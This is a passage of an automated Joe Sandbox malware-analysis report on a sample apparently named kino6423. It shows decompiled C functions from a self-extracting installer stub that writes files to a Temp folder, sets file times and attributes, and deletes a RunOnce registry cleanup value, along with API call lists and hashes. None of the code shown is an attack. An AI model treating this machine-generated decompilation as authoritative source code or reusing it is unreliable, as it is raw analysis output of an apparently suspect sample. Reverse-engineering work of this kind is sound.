						E00E565E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E00E52390( &_v268);
					_t11 =  *0xe58a20; // 0x0
				}
				if( *0xe59a40 != 1 && _t11 != 0) {
					_t11 = E00E51FE1(_t22); // executed
				}
				 *0xe58a20 =  *0xe58a20 & 0x00000000;
				return E00E56CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}

0x00e552b6
0x00e552b6
0x00e552b6
0x00e552c1
0x00e552c8
0x00e552cb
0x00e552cc
0x00e552d4
0x00e552d6
0x00e552d7
0x00e552de
0x00e552e0
0x00e552f2
0x00e552fa
0x00e552fa
0x00e55302
0x00e55305
0x00e5530c
0x00e55312
0x00e55316
0x00e55316
0x00e55317
0x00e5531c
0x00e5531f
0x00e55333
0x00e55345
0x00e55351
0x00e55359
0x00e55359
0x00e55363
0x00e55369
0x00e5536f
0x00e55374
0x00e55374
0x00e55381
0x00e55387
0x00e55387
0x00e5538f
0x00e553a0

APIs

SetFileAttributesA.KERNELBASE(006B8E98,00000080,?,00000000), ref: 00E552F2
DeleteFileA.KERNELBASE(006B8E98), ref: 00E552FA
LocalFree.KERNEL32(006B8E98,?,00000000), ref: 00E55305
LocalFree.KERNEL32(006B8E98), ref: 00E5530C
SetCurrentDirectoryA.KERNELBASE(00E511FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00E55363

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E55334

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 2833751637-3290032183
Opcode ID: ebc6128bfaefbbfbf8b9cf6fedb1928e69d05572916158fa3be64144d6673e15
Instruction ID: a0c6ae4471744f945391c4af6e7410610280a0f9beeb03fde12d40a1f436d39f
Opcode Fuzzy Hash: ebc6128bfaefbbfbf8b9cf6fedb1928e69d05572916158fa3be64144d6673e15
Instruction Fuzzy Hash: 3121CF32521714DFDB689B21DE19BA977A0AB00357F042EA9EC46731A6DBB05D8CCB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E51FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E51FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0xe58530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}

0x00e51fee
0x00e52005
0x00e5200d
0x00e52017
0x00000000
0x00e52020
0x00e5200d
0x00e52029

APIs

RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00E5538C,?,?,00E5538C), ref: 00E52005
RegDeleteValueA.KERNELBASE(00E5538C,wextract_cleanup2,?,?,00E5538C), ref: 00E52017
RegCloseKey.ADVAPI32(00E5538C,?,?,00E5538C), ref: 00E52020

Strings

wextract_cleanup2, xrefs: 00E51FE7, 00E5200F
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E51FFB

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
API String ID: 849931509-3354236729
Opcode ID: f6f6cde9d10f612846cc2ad017022d049fac1fa0e33f5f369431ae56f5efca2d
Instruction ID: 12a835e5915dc65034b96de36ff649d0c5ffc710e325e7e11bd763e9f71819fa
Opcode Fuzzy Hash: f6f6cde9d10f612846cc2ad017022d049fac1fa0e33f5f369431ae56f5efca2d
Instruction Fuzzy Hash: C8E04F30561318BFEB258F92ED0AF5A7B2AF701747F140AA9BE04B00E0EB619A1CD605

Uniqueness

Uniqueness Score: -1.00%

Function 00E54CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E54CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0xe58004; // 0x5ba1a886
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0xe591d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00E54E99(_t75);
						L35:
						return E00E56CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0xe58584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0xe591e4;
						_t58 = 0xe591e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0xe591e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0xe591e4;
						_t30 = E00E54702( &_v268, 0xe591e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E00E5476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00E54980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E00E547E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0xe593f4 =  *0xe593f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0xe591e4;
						_t63 = 0xe591e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0xe591e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0xe591e4;
						_t30 = E00E54702( &_v268, 0xe591e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E00E54C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E00E54B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E00E54B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}

0x00e54cd0
0x00e54cdb
0x00e54ce0
0x00e54ce2
0x00e54cee
0x00e54cf2
0x00e54d0e
0x00e54d0e
0x00e54d11
0x00e54e83
0x00e54e88
0x00e54e98
0x00e54e98
0x00e54d17
0x00e54d17
0x00e54d1a
0x00e54d2f
0x00e54d2f
0x00000000
0x00e54d2f
0x00e54d1c
0x00e54d1c
0x00e54d1f
0x00e54dcb
0x00e54dd0
0x00e54dd2
0x00e54ddd
0x00e54ddd
0x00e54de3
0x00e54de8
0x00e54ded
0x00e54ded
0x00e54def
0x00e54df0
0x00e54df0
0x00e54df4
0x00e54df4
0x00e54df6
0x00e54df9
0x00e54dfc
0x00e54dfc
0x00e54dfe
0x00e54dff
0x00e54dff
0x00e54e03
0x00e54e08
0x00e54e0a
0x00e54e0f
0x00e54d03
0x00e54d03
0x00000000
0x00e54d03
0x00e54e18
0x00e54e20
0x00e54e25
0x00e54e27
0x00000000
0x00000000
0x00e54e33
0x00e54e38
0x00e54e3a
0x00000000
0x00000000
0x00e54e40
0x00e54e51
0x00e54e56
0x00e54e5b
0x00e54e5e
0x00000000
0x00000000
0x00e54e6a
0x00e54e6f
0x00e54e71
0x00000000
0x00000000
0x00e54e77
0x00e54e7d
0x00000000
0x00e54e7d
0x00e54d25
0x00e54d25
0x00e54d28
0x00e54d36
0x00e54d3b
0x00e54d40
0x00e54d40
0x00e54d42
0x00e54d43
0x00e54d43
0x00e54d47
0x00e54d4a
0x00e54d4a
0x00e54d4c
0x00e54d4f
0x00e54d4f
0x00e54d51
0x00e54d52
0x00e54d52
0x00e54d56
0x00e54d5b
0x00e54d5d
0x00e54d62
0x00000000
0x00000000
0x00e54d67
0x00e54d6f
0x00e54d74
0x00e54d76
0x00000000
0x00000000
0x00e54d7c
0x00e54d84
0x00e54d89
0x00e54d8b
0x00000000
0x00000000
0x00e54d94
0x00e54d99
0x00e54d9e
0x00e54da1
0x00e54daa
0x00e54daa
0x00e54da3
0x00e54da3
0x00e54da3
0x00e54db5
0x00e54dbb
0x00e54dbd
0x00000000
0x00e54dc3
0x00e54dc5
0x00000000
0x00e54dc5
0x00e54dbd
0x00e54d2a
0x00e54d2a
0x00e54d2d
0x00000000
0x00000000
0x00000000
0x00e54d2d
0x00e54cf8
0x00e54cfd
0x00e54d02
0x00000000

APIs

SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00E54DB5
SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00E54DDD

Strings

C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00E54D36, 00E54DE3

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
API String ID: 3625706803-3290032183
Opcode ID: 1067f61944d74d3796ffbdb23d3d4e0af4ea7cf7a0dcc0c20341f1b6f5d1116d
Instruction ID: 5f8bbde430db722667ef94623273c29604e796974d5b0d7f52baea6df387a938
Opcode Fuzzy Hash: 1067f61944d74d3796ffbdb23d3d4e0af4ea7cf7a0dcc0c20341f1b6f5d1116d
Instruction Fuzzy Hash: 6D4112B62002018BCB269E38D9456F5B3B5AB4530EF046E69DC86B72C5EE31DECEC750

Uniqueness

Uniqueness Score: -1.00%

Function 00E54C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E54C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xe58d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xe58d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00e54c40
0x00e54c4a
0x00e54c8d
0x00000000
0x00e54c70
0x00e54c70
0x00e54c7e
0x00e54c86
0x00000000
0x00000000
0x00000000
0x00e54c8a

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00E54C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E54C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00E54C7E

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: badd7eea2db63d48010e083f0f198512a4cf71239130004c77dfee2785fd1212
Instruction ID: 75a3ad90936c90d430240277fb1a5fbb48c5112331cc15c5c4c7e65f49238fd7
Opcode Fuzzy Hash: badd7eea2db63d48010e083f0f198512a4cf71239130004c77dfee2785fd1212
Instruction Fuzzy Hash: 78F096B250120C6FAB14DFB5CD48DBBB7FDEB4424A7440E3BA915F1090EA30D958C760

Uniqueness

Uniqueness Score: -1.00%

Function 00E5487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E5487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00E5490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00e54880
0x00e5488c
0x00e54894
0x00e548a0
0x00e548c9
0x00e548ce
0x00e548a2
0x00e548a8
0x00e548b7
0x00e548bc
0x00e548aa
0x00e548ac
0x00e548ac
0x00e548a8
0x00e548de
0x00e548e7
0x00e5490b
0x00e548ee
0x00e548f0
0x00000000
0x00e54902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00E54A23,?,00E54F67,*MEMCAB,00008000,00000180), ref: 00E548DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00E54F67,*MEMCAB,00008000,00000180), ref: 00E54902

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c48eb7aaca0dfed670ddd01ddf2e5ec2b080c5535815d3c6ba9a8b2a22087c99
Instruction ID: 3c66e76dc7d331fc13a97eb186f840655c3dceb784613fb7922d45511bcc6799
Opcode Fuzzy Hash: c48eb7aaca0dfed670ddd01ddf2e5ec2b080c5535815d3c6ba9a8b2a22087c99
Instruction Fuzzy Hash: ED0178E3E126302AF22840294C89FF7555C9BD663AF1A1B30BDAAB61C1D5645C4881E0

Uniqueness

Uniqueness Score: -1.00%

Function 00E54AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E54AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xe5858c; // 0x270
				_t9 = E00E53680(_t20);
				if( *0xe591d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xe58d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xe59400; // 0xc1400
							_t15 = _t14 + _t25;
							 *0xe59400 = _t15;
							if( *0xe58184 != 0) {
								_t21 =  *0xe58584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe593f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00e54ad5
0x00e54adb
0x00e54ae7
0x00e54aee
0x00e54b05
0x00e54b0d
0x00e54b14
0x00e54b1a
0x00e54b1c
0x00e54b21
0x00e54b2a
0x00e54b2f
0x00e54b31
0x00e54b39
0x00e54b54
0x00e54b54
0x00e54b39
0x00e54b2f
0x00e54b0f
0x00e54b0f
0x00e54b0f
0x00e54b5e
0x00e54ae9
0x00e54aed
0x00e54aed

APIs

Part of subcall function 00E53680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E5369F
Part of subcall function 00E53680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E536B2
Part of subcall function 00E53680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E536DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00E54B05

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 7f3d3a838751fea801631b58ec08db3e08f611555018226eac7a15f349ad72bf
Instruction ID: 6ef6f8d6b93dd6e8cf2f5b84c1ae4025073ff170a50f585f66a11dedb53cbc71
Opcode Fuzzy Hash: 7f3d3a838751fea801631b58ec08db3e08f611555018226eac7a15f349ad72bf
Instruction Fuzzy Hash: 1101ADB1200300AFDB088F6AED05BE27798A74472BF149A25E939BB1E1DB70CC59CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E5658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E5658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xe58b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xe58b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00E516B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00e56592
0x00e56594
0x00e56596
0x00e56598
0x00e56598
0x00e5659b
0x00e5659b
0x00e5659d
0x00e5659e
0x00e565a2
0x00e565a4
0x00e565a9
0x00e565b2
0x00e565b6
0x00e565ba
0x00e565c3
0x00e565c5
0x00e565c8
0x00e565c8
0x00e565c3
0x00e565c9
0x00e565cc
0x00e565d2
0x00e565d1
0x00e565d1
0x00000000
0x00e565dc
0x00000000

APIs

CharPrevA.USER32(00E58B3E,00E58B3F,00000001,00E58B3E,-00000003,?,00E560EC,00E51140,?), ref: 00E565BA

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 71ab516763a3aa7d8c1af3533500006cb5b6dc472f4c70c52827b40cf6167650
Instruction ID: 42e735ad624477c4c4d8d0e0e36a376f26a9c595d9ba0e225d35dd9e4a70023d
Opcode Fuzzy Hash: 71ab516763a3aa7d8c1af3533500006cb5b6dc472f4c70c52827b40cf6167650
Instruction Fuzzy Hash: 8EF0A2321042505FD331050D9884BA6BFDDDB85352F581D6EEDDAE3245EA558C0D83A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E5621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E5621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xe58004; // 0x5ba1a886
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00E5597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00E544B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xe59124 = E00E56285();
					_t9 = 0;
				}
				return E00E56CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00e56229
0x00e56230
0x00e56247
0x00e5626a
0x00e56272
0x00e56249
0x00e56255
0x00e5625f
0x00e56264
0x00e56264
0x00e56284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00E5623F

Part of subcall function 00E544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E54518
Part of subcall function 00E544B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00E54554

Part of subcall function 00E56285: GetLastError.KERNEL32(00E55BBC), ref: 00E56285

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 51874239231c6799846f7f5d159ee855dd71e5a5ca82e460f72b102435c3e156
Instruction ID: df5cf37afc0c1ac84606591d418bfcdf530ebe780fe4a0047c84572bd134d10d
Opcode Fuzzy Hash: 51874239231c6799846f7f5d159ee855dd71e5a5ca82e460f72b102435c3e156
Instruction Fuzzy Hash: F4F0B4B0700308AFEB94EB758D02BBE73E8DB84302F800869AD85F70D1DD749D4C8650

Uniqueness

Uniqueness Score: -1.00%

Function 00E54B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E54B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xe58d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xe58d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xe58d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xe58d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xe58d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xe58d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xe58d6c)) = 0;
				return 0;
			}

0x00e54b66
0x00e54b74
0x00e54b98
0x00e54ba0
0x00000000
0x00e54bac
0x00e54ba4
0x00000000
0x00e54ba4
0x00e54b78
0x00e54b7e
0x00e54b84
0x00e54b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00E54FA1,00000000), ref: 00E54B98

Memory Dump Source

Source File: 00000002.00000002.329120312.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true

Associated: 00000002.00000002.329113607.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329129093.0000000000E58000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.329135818.0000000000E5C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e50000_kino6423.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: faaa7c79c0ddcef4ff96d509d852a541b8112c43f5b97e6bdc951248d3428656
Instruction ID: 90002a6b6526b8bba56859cbbc2bbf01151119b68e0ce4b41f8d4274ce55567d
Opcode Fuzzy Hash: faaa7c79c0ddcef4ff96d509d852a541b8112c43f5b97e6bdc951248d3428656
Instruction Fuzzy Hash: 0FF0FE71500B089E87A18E3B8D05652BBFAAA953673101F2B94AEF21D0DB30A845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E566AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E566AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
